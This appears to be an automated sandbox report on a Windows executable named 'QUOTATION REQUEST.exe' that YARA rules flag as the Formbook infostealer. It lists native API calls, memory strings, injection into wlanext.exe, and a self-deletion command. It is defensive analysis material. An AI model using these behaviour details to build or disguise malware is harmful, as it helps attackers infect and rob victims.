Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION REQUEST.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004181C0 NtCreateFile,	3_2_004181C0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00418270 NtReadFile,	3_2_00418270
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182F0 NtClose,	3_2_004182F0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004183A0 NtAllocateVirtualMemory,	3_2_004183A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182EF NtClose,	3_2_004182EF
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182BA NtReadFile,	3_2_004182BA
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041839F NtAllocateVirtualMemory,	3_2_0041839F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk,	9_2_03639A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03639910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk,	9_2_036399A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03639860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk,	9_2_03639840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03639710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03639FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03639780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03639660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk,	9_2_03639650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_036396E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk,	9_2_036396D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639540 NtReadFile,LdrInitializeThunk,	9_2_03639540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395D0 NtClose,LdrInitializeThunk,	9_2_036395D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639B00 NtSetValueKey,	9_2_03639B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A3B0 NtGetContextThread,	9_2_0363A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A20 NtResumeThread,	9_2_03639A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A00 NtProtectVirtualMemory,	9_2_03639A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A10 NtQuerySection,	9_2_03639A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A80 NtOpenDirectoryObject,	9_2_03639A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639950 NtQueueApcThread,	9_2_03639950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399D0 NtCreateProcessEx,	9_2_036399D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363B040 NtSuspendThread,	9_2_0363B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639820 NtEnumerateKey,	9_2_03639820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398F0 NtReadVirtualMemory,	9_2_036398F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398A0 NtWriteVirtualMemory,	9_2_036398A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639760 NtOpenProcess,	9_2_03639760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A770 NtOpenThread,	9_2_0363A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639770 NtSetInformationFile,	9_2_03639770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639730 NtQueryVirtualMemory,	9_2_03639730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A710 NtOpenProcessToken,	9_2_0363A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036397A0 NtUnmapViewOfSection,	9_2_036397A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639670 NtQueryInformationProcess,	9_2_03639670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639610 NtEnumerateValueKey,	9_2_03639610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639560 NtWriteFile,	9_2_03639560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639520 NtWaitForSingleObject,	9_2_03639520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363AD30 NtSetContextThread,	9_2_0363AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395F0 NtQueryInformationFile,	9_2_036395F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE81C0 NtCreateFile,	9_2_00EE81C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82F0 NtClose,	9_2_00EE82F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE8270 NtReadFile,	9_2_00EE8270
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE83A0 NtAllocateVirtualMemory,	9_2_00EE83A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82EF NtClose,	9_2_00EE82EF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82BA NtReadFile,	9_2_00EE82BA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE839F NtAllocateVirtualMemory,	9_2_00EE839F

Detected potential crypto function

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C194A8	0_2_00C194A8
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1C3A0	0_2_00C1C3A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1A758	0_2_00C1A758
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_04C1C900	0_2_04C1C900
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040102F	3_2_0040102F
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401209	3_2_00401209
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CB85	3_2_0041CB85
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C5D	3_2_00408C5D
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A3	3_2_0041B4A3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A6	3_2_0041B4A6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041BD74	3_2_0041BD74
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C58C	3_2_0041C58C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CF94	3_2_0041CF94
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2B28	9_2_036C2B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B03DA	9_2_036B03DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BDBD2	9_2_036BDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362EBB0	9_2_0362EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFA2B	9_2_036AFA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C22AE	9_2_036C22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FF900	9_2_035FF900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CE824	9_2_036CE824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1002	9_2_036B1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C28EC	9_2_036C28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C20A8	9_2_036C20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B090	9_2_0360B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1FF1	9_2_036C1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CDFCE	9_2_036CDFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03616E30	9_2_03616E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD616	9_2_036BD616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2EF7	9_2_036C2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1D55	9_2_036C1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2D07	9_2_036C2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F0D20	9_2_035F0D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0	9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C25DD	9_2_036C25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD466	9_2_036BD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360841F	9_2_0360841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECB85	9_2_00EECB85
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A6	9_2_00EEB4A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A3	9_2_00EEB4A3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C60	9_2_00ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C5D	9_2_00ED8C5D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC58C	9_2_00EEC58C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2D90	9_2_00ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEBD74	9_2_00EEBD74
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2FB0	9_2_00ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECF94	9_2_00EECF94

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: String function: 035FB150 appears 45 times

Sample file is different than original file name gathered from version info

Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe

Uses 32bit PE files

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: QUOTATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@15/6

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_002394E5 push cs; iretd	0_2_002394E6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C93F pushad ; ret	3_2_0041C943
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C9F4 push 1B579E0Eh; ret	3_2_0041CA15
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00415249 push ebx; iretd	3_2_0041524C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004152D2 push 59027665h; retf	3_2_004152E2
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00413348 push ds; iretd	3_2_00413349
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B3B5 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040D441 push EB161335h; ret	3_2_0040D446
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B46C push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B402 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B40B push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00C494E5 push cs; iretd	3_2_00C494E6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0364D0D1 push ecx; ret	9_2_0364D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC9F4 push 1B579E0Eh; ret	9_2_00EECA15
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC93F pushad ; ret	9_2_00EEC943
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE52D2 push 59027665h; retf	9_2_00EE52E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE5249 push ebx; iretd	9_2_00EE524C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB3B5 push eax; ret	9_2_00EEB408
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE3348 push ds; iretd	9_2_00EE3349
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB46C push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EDD441 push EB161335h; ret	9_2_00EDD446
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB40B push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB402 push eax; ret	9_2_00EEB408

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
